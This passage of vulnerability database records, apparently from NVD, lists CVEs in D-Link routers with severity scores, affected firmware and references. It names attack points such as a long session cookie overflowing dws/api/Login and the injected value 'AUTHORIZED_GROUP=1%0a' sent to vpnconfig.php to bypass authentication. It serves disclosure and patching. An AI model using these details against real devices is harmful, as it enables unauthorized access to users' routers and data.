"value": "D-Link routers with the mydlink feature have some web interfaces without authentication requirements. An attacker can remotely obtain users\u0027 DNS query logs and login logs. Vulnerable targets include but are not limited to the latest firmware versions of DIR-817LW (A1-1.04), DIR-816L (B1-2.06), DIR-816 (B1-2.06?), DIR-850L (A1-1.09), and DIR-868L (A1-1.10)."
},
{
"lang": "es",
"value": "Los routers D-Link con la funcionalidad mydlink presentan algunas interfaces web sin requerimientos de autenticaci\u00f3n. Un atacante puede conseguir de forma remota los registros de consultas de DNS de los usuarios y los registros de inicio de sesi\u00f3n. Los objetivos vulnerables incluyen pero no se limitan a las versiones m\u00e1s recientes de firmware de DIR-817LW (A1-1.04), DIR-816L (B1-2.06), DIR-816 (B1-2.06?), DIR-850L (A1-1.09) y DIR-868L (A1-1.10)."
}
],
"id": "CVE-2019-7642",
"lastModified": "2024-11-21T04:48:27.040",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2019-03-25T22:29:00.810",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/xw77cve/CVE-2019-7642/blob/master/README.md"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/xw77cve/CVE-2019-7642/blob/master/README.md"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-306"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2016-08-25 21:59
Modified
2024-11-21 02:54
Severity ?
Summary
Stack-based buffer overflow in dws/api/Login on D-Link DIR-850L B1 2.07 before 2.07WWB05, DIR-817 Ax, DIR-818LW Bx before 2.05b03beta03, DIR-822 C1 3.01 before 3.01WWb02, DIR-823 A1 1.00 before 1.00WWb05, DIR-895L A1 1.11 before 1.11WWb04, DIR-890L A1 1.09 before 1.09b14, DIR-885L A1 1.11 before 1.11WWb07, DIR-880L A1 1.07 before 1.07WWb08, DIR-868L B1 2.03 before 2.03WWb01, and DIR-868L C1 3.00 before 3.00WWb01 devices allows remote attackers to execute arbitrary code via a long session cookie.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cret@cert.org | http://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10063 | Vendor Advisory | |
| cret@cert.org | http://www.kb.cert.org/vuls/id/332115 | Third Party Advisory, US Government Resource | |
| cret@cert.org | http://www.securityfocus.com/bid/92427 | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | http://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10063 | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.kb.cert.org/vuls/id/332115 | Third Party Advisory, US Government Resource | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/92427 | Third Party Advisory, VDB Entry |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| dlink | dir-868l_firmware | * | |
| dlink | dir-868l | b1 | |
| dlink | dir-822_firmware | 3.01 | |
| dlink | dir-822 | a1 | |
| d-link | dir-880l_firmware | * | |
| dlink | dir-880l | a1 | |
| d-link | dir-850l_firmare | * | |
| dlink | dir-850l | b1 | |
| d-link | dir-895l_firmware | * | |
| dlink | dir-895l | a1 | |
| d-link | dir-817l\(w\)_firmware | * | |
| dlink | dir-817l\(w\) | ax | |
| d-link | dir-818l\(w\)_firmware | * | |
| dlink | dir-818l\(w\) | ax | |
| d-link | dir-890l_firmware | * | |
| dlink | dir-890l | a1 | |
| d-link | dir-823_firmware | * | |
| dlink | dir-823 | a1 | |
| d-link | dir-885l_firmware | * | |
| dlink | dir-885l | a1 | |
| dlink | dir-868l_firmware | * | |
| dlink | dir-868l | c1 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-868l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F7128EB8-BAAC-4979-87D6-B239B149F110",
"versionEndIncluding": "2.03",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-868l:b1:*:*:*:*:*:*:*",
"matchCriteriaId": "A88E4C44-995A-4E95-A57F-52E9C3153B99",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-822_firmware:3.01:*:*:*:*:*:*:*",
"matchCriteriaId": "0E27DC2C-A20A-421C-AE33-95ED07279A66",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-822:a1:*:*:*:*:*:*:*",
"matchCriteriaId": "9F3F0CEB-779D-4084-9564-E8EEE2A4F120",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:d-link:dir-880l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2E1C155D-4558-406C-9696-AA94673B9F30",
"versionEndIncluding": "1.07",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-880l:a1:*:*:*:*:*:*:*",
"matchCriteriaId": "6FF5422A-1807-4D3D-89A3-99C654A52B72",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:d-link:dir-850l_firmare:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4CAB47A8-4E5D-4615-9537-27D08D877C8C",
"versionEndIncluding": "2.07",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-850l:b1:*:*:*:*:*:*:*",
"matchCriteriaId": "D7904795-59F2-4FB8-A0EF-4700613811D2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:d-link:dir-895l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "52650DA9-912B-42B2-B547-018C42840FA0",
"versionEndIncluding": "1.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-895l:a1:*:*:*:*:*:*:*",
"matchCriteriaId": "F9E28556-0B5F-4EB3-9479-2965CB4D2744",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:d-link:dir-817l\\(w\\)_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "17F7A584-6B5A-47A4-8035-35C8E5BE65E1",
"versionEndIncluding": "jul.2016",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-817l\\(w\\):ax:*:*:*:*:*:*:*",
"matchCriteriaId": "9242048F-6D15-41B8-BB12-4AD2DABBFB95",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:d-link:dir-818l\\(w\\)_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B1261926-A066-4C6C-9A82-99C7BF80C986",
"versionEndIncluding": "2.05",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-818l\\(w\\):ax:*:*:*:*:*:*:*",
"matchCriteriaId": "10524F21-E24F-4E3C-BB94-9ED48350CFF5",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:d-link:dir-890l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9AA3F1D9-DAE3-4FEB-88FD-0FAEA4DF6982",
"versionEndIncluding": "1.09",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-890l:a1:*:*:*:*:*:*:*",
"matchCriteriaId": "BA7B9C43-D73A-43A4-B00A-5205F7D108E3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:d-link:dir-823_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "80072246-8F20-481E-BEC5-D668C2ECCFE2",
"versionEndIncluding": "1.00",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-823:a1:*:*:*:*:*:*:*",
"matchCriteriaId": "166B8C1C-B2D0-4D28-B2E8-D0F9B688455A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:d-link:dir-885l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "52069E34-698A-48D8-AB3B-91881FC63AD9",
"versionEndIncluding": "1.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-885l:a1:*:*:*:*:*:*:*",
"matchCriteriaId": "486EBE04-FB27-4BA1-B651-BF45DB0999A3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-868l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CCCEFF8B-AB66-4197-A386-47E64C975086",
"versionEndIncluding": "3.00",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-868l:c1:*:*:*:*:*:*:*",
"matchCriteriaId": "C6B2088D-9FAE-46AE-A234-FEDA8E5359D8",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Stack-based buffer overflow in dws/api/Login on D-Link DIR-850L B1 2.07 before 2.07WWB05, DIR-817 Ax, DIR-818LW Bx before 2.05b03beta03, DIR-822 C1 3.01 before 3.01WWb02, DIR-823 A1 1.00 before 1.00WWb05, DIR-895L A1 1.11 before 1.11WWb04, DIR-890L A1 1.09 before 1.09b14, DIR-885L A1 1.11 before 1.11WWb07, DIR-880L A1 1.07 before 1.07WWb08, DIR-868L B1 2.03 before 2.03WWb01, and DIR-868L C1 3.00 before 3.00WWb01 devices allows remote attackers to execute arbitrary code via a long session cookie."
},
{
"lang": "es",
"value": "Desbordamiento del b\u00fafer basado en pila en dws/api/Login en dispositivos D-Link DIR-850L B1 2.07 en versiones anteriores a 2.07WWB05, DIR-817 Ax, DIR-818LW Bx en versiones anteriores a 2.05b03beta03, DIR-822 C1 3.01 en versiones anteriores a 3.01WWb02, DIR-823 A1 1.00 en versiones anteriores a 1.00WWb05, DIR-895L A1 1.11 en versiones anteriores a 1.11WWb04, DIR-890L A1 1.09 en versiones anteriores a 1.09b14, DIR-885L A1 1.11 en versiones anteriores a 1.11WWb07, DIR-880L A1 1.07 en versiones anteriores a 1.07WWb08, DIR-868L B1 2.03 en versiones anteriores a 2.03WWb01 y DIR-868L C1 3.00 en versiones anteriores a 3.00WWb01 permite a atacantes remotos ejecutar c\u00f3digo arbitrario a trav\u00e9s de una sesi\u00f3n de cookie larga."
}
],
"id": "CVE-2016-5681",
"lastModified": "2024-11-21T02:54:48.910",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2016-08-25T21:59:04.150",
"references": [
{
"source": "cret@cert.org",
"tags": [
"Vendor Advisory"
],
"url": "http://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10063"
},
{
"source": "cret@cert.org",
"tags": [
"Third Party Advisory",
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/332115"
},
{
"source": "cret@cert.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/92427"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10063"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/332115"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/92427"
}
],
"sourceIdentifier": "cret@cert.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-119"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2023-08-18 03:15
Modified
2024-11-21 08:15
Severity ?
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Summary
D-Link DIR-868L fw_revA_1-12_eu_multi_20170316 was discovered to contain a buffer overflow via the param_2 parameter in the FUN_0000acb4 function.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| dlink | dir-868l_firmware | 1.12_eu_multi_20170316 | |
| dlink | dir-868l | a |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-868l_firmware:1.12_eu_multi_20170316:*:*:*:*:*:*:*",
"matchCriteriaId": "0A83B951-9E4E-4CF8-BFDB-14C167F02F09",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-868l:a:*:*:*:*:*:*:*",
"matchCriteriaId": "8DA57BC8-C8EE-49E3-A592-C68CC2AAA8E4",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [
{
"sourceIdentifier": "cve@mitre.org",
"tags": [
"unsupported-when-assigned"
]
}
],
"descriptions": [
{
"lang": "en",
"value": "D-Link DIR-868L fw_revA_1-12_eu_multi_20170316 was discovered to contain a buffer overflow via the param_2 parameter in the FUN_0000acb4 function."
},
{
"lang": "es",
"value": "Se descubri\u00f3 que D-Link DIR-868L fw_revA_1-12_eu_multi_20170316 contiene un desbordamiento de b\u00fafer a trav\u00e9s del par\u00e1metro param_2 en la funci\u00f3n FUN_0000acb4.\n"
}
],
"id": "CVE-2023-39667",
"lastModified": "2024-11-21T08:15:47.627",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
},
"published": "2023-08-18T03:15:22.020",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "https://github.com/Davidteeri/Bug-Report/blob/main/D-Link/DIR-868L%20httpd-Improper%20Input%20Validation.md"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://support.dlink.com/"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://www.dlink.com/en/security-bulletin/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "https://github.com/Davidteeri/Bug-Report/blob/main/D-Link/DIR-868L%20httpd-Improper%20Input%20Validation.md"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://support.dlink.com/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://www.dlink.com/en/security-bulletin/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-120"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-120"
}
],
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
}
Vulnerability from fkie_nvd
Published
2023-08-18 03:15
Modified
2024-11-21 08:15
Severity ?
Summary
D-Link DIR-868L fw_revA_1-12_eu_multi_20170316 was discovered to contain a buffer overflow via the acStack_50 parameter.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| dlink | dir-868l_firmware | 1.12_eu_multi_20170316 | |
| dlink | dir-868l | a |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-868l_firmware:1.12_eu_multi_20170316:*:*:*:*:*:*:*",
"matchCriteriaId": "0A83B951-9E4E-4CF8-BFDB-14C167F02F09",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-868l:a:*:*:*:*:*:*:*",
"matchCriteriaId": "8DA57BC8-C8EE-49E3-A592-C68CC2AAA8E4",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [
{
"sourceIdentifier": "cve@mitre.org",
"tags": [
"unsupported-when-assigned"
]
}
],
"descriptions": [
{
"lang": "en",
"value": "D-Link DIR-868L fw_revA_1-12_eu_multi_20170316 was discovered to contain a buffer overflow via the acStack_50 parameter."
},
{
"lang": "es",
"value": "Se descubri\u00f3 que D-Link DIR-868L fw_revA_1-12_eu_multi_20170316 contiene un desbordamiento de b\u00fafer a trav\u00e9s del par\u00e1metro acStack_50.\n"
}
],
"id": "CVE-2023-39665",
"lastModified": "2024-11-21T08:15:47.230",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2023-08-18T03:15:21.787",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "https://github.com/Davidteeri/Bug-Report/blob/main/D-Link/DIR-868L-bufferoverflow.md"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://support.dlink.com/"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://www.dlink.com/en/security-bulletin/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "https://github.com/Davidteeri/Bug-Report/blob/main/D-Link/DIR-868L-bufferoverflow.md"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://support.dlink.com/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://www.dlink.com/en/security-bulletin/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-120"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-01-02 14:16
Modified
2024-11-21 04:38
Severity ?
Summary
D-Link DIR-859 routers before v1.07b03_beta allow Unauthenticated Information Disclosure via the AUTHORIZED_GROUP=1%0a value, as demonstrated by vpnconfig.php.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| dlink | dir-859_firmware | * | |
| dlink | dir-859_firmware | 1.06b01 | |
| dlink | dir-859 | - | |
| dlink | dir-822_firmware | * | |
| dlink | dir-822 | - | |
| dlink | dir-822_firmware | * | |
| dlink | dir-822 | - | |
| dlink | dir-823_firmware | * | |
| dlink | dir-823 | - | |
| dlink | dir-865l_firmware | * | |
| dlink | dir-865l | - | |
| dlink | dir-868l_firmware | * | |
| dlink | dir-868l | - | |
| dlink | dir-868l_firmware | * | |
| dlink | dir-868l | - | |
| dlink | dir-869_firmware | * | |
| dlink | dir-869 | - | |
| dlink | dir-880l_firmware | * | |
| dlink | dir-880l | - | |
| dlink | dir-890l_firmware | * | |
| dlink | dir-890l | - | |
| dlink | dir-890r_firmware | * | |
| dlink | dir-890r | - | |
| dlink | dir-885l_firmware | * | |
| dlink | dir-885l | - | |
| dlink | dir-885r_firmware | * | |
| dlink | dir-885r | - | |
| dlink | dir-895l_firmware | * | |
| dlink | dir-895l | - | |
| dlink | dir-895r_firmware | * | |
| dlink | dir-895r | - | |
| dlink | dir-818lx_firmware | - | |
| dlink | dir-818lx | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-859_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C2ABCF49-625F-4267-8B6D-14081B31E8B0",
"versionEndIncluding": "1.05b03",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dir-859_firmware:1.06b01:beta1:*:*:*:*:*:*",
"matchCriteriaId": "BB555A1A-6B26-483E-ABFC-B64B928E7CC5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-859:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D1DEEF5B-D8E9-45F3-8A89-52CE8402E6F5",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-822_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8F8E6CDA-679A-4A31-8D8D-BD283C5E1E3E",
"versionEndIncluding": "2.03b01",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-822:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B3894F0E-37F8-4A89-87AC-1DB524D4AE04",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-822_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "46B25758-8EC2-4598-A834-9D513B030629",
"versionEndIncluding": "3.12b04",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-822:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B3894F0E-37F8-4A89-87AC-1DB524D4AE04",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-823_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "99D9046B-206E-4267-98BA-BF572682F134",
"versionEndIncluding": "1.00b06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-823:-:*:*:*:*:*:*:*",
"matchCriteriaId": "EC426833-BEA7-4029-BBBB-94688EE801BC",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-865l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4406996E-761D-4EDC-9877-17B7472C1422",
"versionEndIncluding": "1.07b01",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-865l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3A853DF-6DF1-4E8E-8D55-95279EE0CB30",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-868l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F9D90548-24FD-416F-9159-6F7AB318C923",
"versionEndIncluding": "1.12b04",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-868l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "33B501D4-BDDD-485E-A5A3-8AA8D5E46061",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-868l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0B0CA3A5-CF3D-4D1B-BB07-EE0D91901BC9",
"versionEndIncluding": "2.05b02",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-868l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "33B501D4-BDDD-485E-A5A3-8AA8D5E46061",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-869_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "499E8ADA-B4ED-42B2-B237-716A77BD546A",
"versionEndIncluding": "1.03b02",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-869:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E9EB6E8E-03FA-4477-B97A-0752B7C443F0",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-880l_firmware:*:*:*:*:*:*:*:*",
